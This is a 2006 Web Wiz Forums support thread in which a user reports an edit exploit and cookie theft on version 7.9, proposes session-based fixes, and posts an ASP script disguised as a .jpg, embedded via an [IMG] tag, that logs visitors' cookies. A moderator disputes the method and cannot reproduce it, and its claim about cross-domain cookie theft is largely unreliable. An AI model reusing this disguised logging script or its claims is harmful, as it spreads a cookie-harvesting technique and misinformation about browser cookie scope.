Web Wiz - Green Windows Web Hosting
Web Wiz Homepage Search Web Wiz

  New Posts New Posts RSS Feed - Dear Web Wiz Family, big secure problem.
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Dear Web Wiz Family, big secure problem.
 Post Reply Post Reply Page  12>
Author
  Topic Search Topic Search  Topic Options Topic Options
emr550m View Drop Down
Newbie
Newbie


Joined: 05 March 2006
Status: Offline
Points: 5 		Post Options Post Options   Thanks (0) Thanks(0)   Quote emr550m Quote  Post ReplyReply Direct Link To This Post Topic: Dear Web Wiz Family, big secure problem.
    Posted: 05 March 2006 at 12:42am
 First of all, i am very thank full to you about creating a wonderfull forum like this and make it open source. I am using web wiz version 7.9 and dont know the new ones.
I have combined my site with web wiz forum and make a good portal. But these days some people (they calls them hacker, i call them dummy person :) is making me sad.  I am searching  about the edit hack. Any user can be edit any message. How this can be happen ? i m searching this right now.
 
While i m searching this i 'll found lots of ugly things that not to be. Please all web masters read this carefully;
 
Web wiz forums (7.9) will working on cookies. İf some one can steal your cookie, he/she can enter the forum as you very easily. With a cookie editor tihs can be done very easily.
 
A have solved this with a simple code change. Just modify the common asp where the UID cookie stored. Store the data on session object.
 
After modifying the forum will see this is not the only thing. A have found a worse thing that is the ugliest thing. IIS web server  has a big huge problem.  
 
As you know when you connect to a IIS web server it gives you a unic sessio id. with this id you will interact with the server. Browsers stores this id as a cookie and it can also be stealen.
 
Some one who has your session id can conect to web server as you. So when you ar online as admin the dummy guy can connect the server as you and blow your forum.
 
Microsoft also knows this issue and dont do anythink. So we must find our solution.
 
I have defined a general variable in session data that is session("securecode") ,  i will equal this data to session id + clients ip ;
 
in every common asp i have look up the clients ip and session. if its not equal to session("securecode") that means some one is connected to server as you...
 
You can freely write me about these two articles freely. My contact email is: info@genc-tanitim.com. You can disscuss on msn also: emr550maranello@hotmail.com.
 
 
 
Now my problem is about editing hack. I see that some  posts are edited with another users that dont have permission. How this can bi happen? what code should i modify in edit post .asp.
 
 
Wery gladfull with meeting you.
Emrah Öz
 
Back to Top
MadDog View Drop Down
Mod Builder Group
Mod Builder Group
Avatar

Joined: 01 January 2002
Status: Offline
Points: 3008 		Post Options Post Options   Thanks (0) Thanks(0)   Quote MadDog Quote  Post ReplyReply Direct Link To This Post Posted: 05 March 2006 at 1:30am
There is not a problem if you update to the latest version!

There are no cookie hacks to steal peoples accounts.
Back to Top
emr550m View Drop Down
Newbie
Newbie


Joined: 05 March 2006
Status: Offline
Points: 5 		Post Options Post Options   Thanks (0) Thanks(0)   Quote emr550m Quote  Post ReplyReply Direct Link To This Post Posted: 05 March 2006 at 1:53am
sir, thats the problem. i have many modifications on the asp pages. So i cant directly put the new file. I just need which which code part will solve this edit hack problem.
Back to Top
dpyers View Drop Down
Senior Member
Senior Member


Joined: 12 May 2003
Status: Offline
Points: 3937 		Post Options Post Options   Thanks (0) Thanks(0)   Quote dpyers Quote  Post ReplyReply Direct Link To This Post Posted: 05 March 2006 at 5:45am
Cookie hacks are only a concern if you're using a shared computer - such as in an internet cafe. Not selecting "remember me" and logging out when done resolves that issue.

Session hijacking is pretty much a thing of the past unless you have a crooked host.

Lead me not into temptation... I know the short cut, follow me.
Back to Top
emr550m View Drop Down
Newbie
Newbie


Joined: 05 March 2006
Status: Offline
Points: 5 		Post Options Post Options   Thanks (0) Thanks(0)   Quote emr550m Quote  Post ReplyReply Direct Link To This Post Posted: 05 March 2006 at 11:57am

Sir cookie stealing can be done from everywhere. Just a single image. Hackers executes emages as php or asp files. The just put the image to their server, and use .

Int. browsers are very dummy things, while it was opening this forum and when it tries to open the image it sends currunt cookies to the image also. So its not an image, it will take our cookie. The same way session hijacking is done.

Default mic. IIS doesnt block session hijcakers.  Im thinking about writing an ISAPI filter for that.
Back to Top
MadDog View Drop Down
Mod Builder Group
Mod Builder Group
Avatar

Joined: 01 January 2002
Status: Offline
Points: 3008 		Post Options Post Options   Thanks (0) Thanks(0)   Quote MadDog Quote  Post ReplyReply Direct Link To This Post Posted: 05 March 2006 at 7:46pm
You can only read cookies from the domain you are on. Since the php/asp file is on a different server it can not read a cookie from the server the image is being called on.

You can not steal cookies using remote asp/php image files.
Back to Top
emr550m View Drop Down
Newbie
Newbie


Joined: 05 March 2006
Status: Offline
Points: 5 		Post Options Post Options   Thanks (0) Thanks(0)   Quote emr550m Quote  Post ReplyReply Direct Link To This Post Posted: 05 March 2006 at 8:14pm
Are you sure about that? I m just thinking like that, but you re wrong. This is just a browser fault. Simple cookie stealin method( this subject is not a hacking i tell this to warn you to secure yourself.)

First of all you need to add the ".jpg" extensions will executed by asp.dll. (This will executes jpg files as asp)

You will create a file that has this code and save it on server. Example name: s.jpg
files web adress is like "http://www.example.com/s.jpg"
Sample code:

<%
dim fs, f,x
set fs=Server.CreateObject("Scripting.FileSystemObject")
set x=fs.GetFile(Server.MapPath("ekledik.txt"))

set f=x.OpenAsTextStream(8)
f.WriteLine(request.ServerVariables("HTTP_COOKIE"))
f.Close
set f=nothing
set fs=nothing

%>

you can also do everything in this. Users see this is just an jpg file. And then you will add this code to the forum which you wantted to steal cookies of users. (Simply use [ IMG ] http://www.example.com/s.jpg[/ IMG])

After that the most ugly thing is;
both Mozilla Firefox, and Internet explorer sends the same cookie to server to gather this image when you are browsing to the forum.

You can freely  test this. I will test and see that thats  right. The stealer can connect to forum as you just a cookie editor. He copies the stolen one to his cookie. Than blooooom!


I m using version 7.9 of web wiz. This version is open to this attack. And i modiified the cookie as session objects.




Edited by emr550m - 05 March 2006 at 8:16pm
Back to Top
MadDog View Drop Down
Mod Builder Group
Mod Builder Group
Avatar

Joined: 01 January 2002
Status: Offline
Points: 3008 		Post Options Post Options   Thanks (0) Thanks(0)   Quote MadDog Quote  Post ReplyReply Direct Link To This Post Posted: 05 March 2006 at 10:09pm
I am telling you it is not possible to use asp or php code to get the cookies from another domain.

If you use "http://www.example.com/s.jpg" on the domain "http://www.webwiz.net" you can not read the cookies from Web Wiz. It will try to read the cookies from example.com

I even coded a test file before i made my first reply.

Edit: NEVERMIND! You are right. As soon as i made the custom extension and tested a asp coded file it did read the cookie! Thats not good! But keep in mind i tested this locally, not on WWF so im not sure if it works 100%.

2nd Edit: I believe i was only getting the cookie from my local system and not WWF. I can not recreate this error after clearing my cookies from localhost. I do not believe this is a problem but i will be doing some more tests to make sure.

Edited by MadDog - 06 March 2006 at 4:12am
Back to Top
 Post Reply Post Reply Page  12>

Forum Jump Forum Permissions View Drop Down

Forum Software by Web Wiz Forums® version 12.08
Copyright ©2001-2026 Web Wiz Ltd.

Become a Fan on Facebook Follow us on X Connect with us on LinkedIn Web Wiz Blogs
About Web Wiz | Contact Web Wiz | Terms & Conditions | Cookies | Privacy Notice

Web Wiz is the trading name of Web Wiz Ltd. Company registration No. 05977755. Registered in England and Wales.
Registered office: Web Wiz Ltd, Unit 18, The Glenmore Centre, Fancy Road, Poole, Dorset, BH12 4FB, UK.

Prices exclude VAT at 20% unless otherwise stated. VAT No. GB988999105 - $, € prices shown as a guideline only.

Copyright ©2001-2026 Web Wiz Ltd. All rights reserved.